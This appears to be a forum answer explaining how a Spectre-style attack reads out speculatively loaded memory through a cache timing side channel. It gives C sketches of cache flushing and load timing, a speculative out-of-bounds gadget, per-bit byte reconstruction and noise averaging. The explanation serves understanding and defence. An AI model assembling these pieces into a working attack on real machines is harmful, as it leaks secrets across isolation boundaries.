I understand the part of the paper where they trick the CPU into speculatively loading part of the victim's memory into the CPU cache. The part I do not understand is how they retrieve it.
They don't retrieve it directly (out-of-bounds read bytes are never "retired" by the CPU and cannot be seen by the attacker).
One attack vector is to do the "retrieval" one bit at a time. After the CPU cache has been prepared (flushed where it has to be) and the branch predictor has been "taught" that an if branch is taken while its condition relies on non-cached data, the CPU speculatively executes the couple of lines inside the if scope, including an out-of-bounds access (yielding a byte B), and then immediately accesses some authorized, non-cached array at an index that depends on one bit of the secret B (B itself is never directly seen by the attacker). Finally, the attacker reads that same authorized array at the index corresponding to the bit being zero and times the access: if that read is fast, the data was still in the cache, meaning the bit of B is zero; if the read is (relatively) slow, the CPU had to load that data into its cache, meaning it wasn't there earlier, meaning the bit of B is one.
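To make the "fast vs. slow" test concrete, here is a minimal sketch of the flush-and-time primitive such an attack relies on, assuming an x86 CPU and GCC/Clang intrinsics (the function names are mine, not from the paper):

#include <stdint.h>
#include <x86intrin.h>   // _mm_clflush, _mm_mfence, __rdtscp

// Evict one cache line so that a later hit/miss on it is meaningful.
static void flush_line(const void *p) {
    _mm_clflush(p);
    _mm_mfence();
}

// Time one load of *p in CPU cycles: small = cache hit, large = cache miss.
static uint64_t time_load(const volatile uint8_t *p) {
    unsigned int aux;
    uint64_t t0 = __rdtscp(&aux);
    uint8_t v = *p;              // the load being measured
    uint64_t t1 = __rdtscp(&aux);
    (void)v;
    return t1 - t0;
}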
For instance: Cond and all of ValidArray are not cached, and LargeEnough is big enough to ensure that the CPU will not load both ValidArray[ valid_index + 0 ] and ValidArray[ valid_index + LargeEnough ] into its cache in one shot:
if ( Cond ) {
    // the next 2 lines are only speculatively executed
    V = SomeArray[ out_of_bounds_attacked_index ];
    Dummy = ValidArray[ valid_index + ( V & bit ) * LargeEnough ];
}
// the next code is always retired (really executed, not only speculatively)
t1 = get_cpu_precise_time();
Dummy2 = ValidArray[ valid_index ];
diff = get_cpu_precise_time() - t1;
if ( diff > SOME_CALCULATED_VALUE ) {
    // slow reload: ValidArray[ valid_index ] was not cached,
    // so V & bit == bit (bit being 1, or 2, or 4, ... or 128)
}
else {
    // fast reload: ValidArray[ valid_index ] was cached, so V & bit == 0
}
where bit is tried successively, first 0x01, then 0x02, ... up to 0x80. By measuring the "time" (number of CPU cycles) the always-retired code takes for each bit, the value of V is revealed: if ValidArray[ valid_index + 0 ] is in the cache, V & bit is 0; otherwise, V & bit is bit.
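Putting the per-bit results together, the byte can be rebuilt with a loop like the one below; recover_bit() is a hypothetical helper standing for one full prepare/speculate/time pass for the given mask, returning nonzero when the timed read was slow:

#include <stdint.h>

// Hypothetical helper: runs one full flush / train / speculate / time pass for
// the given mask and returns nonzero when the timed reload was slow (cache miss).
int recover_bit(uint8_t bit);

// Rebuild the secret byte V from the 8 per-bit tests.
uint8_t recover_byte(void) {
    uint8_t recovered = 0;
    for (unsigned bit = 0x01; bit <= 0x80; bit <<= 1) {
        if (recover_bit((uint8_t)bit))   // slow reload => (V & bit) != 0
            recovered |= (uint8_t)bit;
    }
    return recovered;                    // the speculatively read byte V
}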
This takes time: each bit requires preparing the CPU L1 cache again, trying the same bit several times to minimize timing errors, etc.
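A simple way to absorb that timing noise (my own illustration, not something spelled out in the paper) is to repeat the measurement for the same bit and take a majority vote; a recover_bit() like the one sketched above could be implemented along these lines, with measure_once() and N_SAMPLES as hypothetical placeholders:

#include <stdint.h>

#define N_SAMPLES 32                        // arbitrary number of repetitions

// Hypothetical helper: one complete flush / train / speculate / time pass,
// returning the measured reload latency (in cycles) for the given bit mask.
uint64_t measure_once(uint8_t bit);

extern uint64_t SOME_CALCULATED_VALUE;      // hit/miss threshold, calibrated per machine

// One possible recover_bit(): majority vote over repeated noisy samples.
int recover_bit(uint8_t bit) {
    int slow_count = 0;
    for (int i = 0; i < N_SAMPLES; i++) {
        if (measure_once(bit) > SOME_CALCULATED_VALUE)
            slow_count++;
    }
    return slow_count > N_SAMPLES / 2;      // mostly slow => (V & bit) != 0
}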
Then the correct attack "offset" has to be determined to read an interesting area.
Clever attack, but not so easy to implement.